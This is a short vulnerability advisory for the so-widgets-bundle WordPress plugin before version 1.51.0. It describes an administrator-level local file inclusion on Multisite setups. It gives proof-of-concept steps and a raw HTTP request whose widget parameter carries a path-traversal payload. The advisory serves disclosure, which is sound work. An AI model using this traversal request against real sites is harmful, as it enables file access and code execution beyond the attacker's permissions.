so-widgets-bundle < 1.51.0 - Admin+ Local File Inclusion

Description The plugin does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites.

PoC

1. Create a multi-site wordpress setup, i.e. using docker-containers, and setup a second “site” with a separate administrator (without super-admin/network-admin rights). 2. Install the so-widgets-bundle plugin and activate it for the network 3. Login as said new administrator to the separate site (here: “site2” at “/site2/”). 4. Navigate to Plugins -> SiteOrigin Widgets 5. Intercept the request when clicking on “Activate” or “Deactivate” of any widget. The request should look like this and provide the nonce: POST /site2/wp-admin/admin-ajax.php?action=so_widgets_bundle_manage&_wpnonce=f29efd46d6 HTTP/1.1 Host: localhost Content-Length: 127 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: [cookie] Connection: close widget=…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/tmp/tmp&active;=1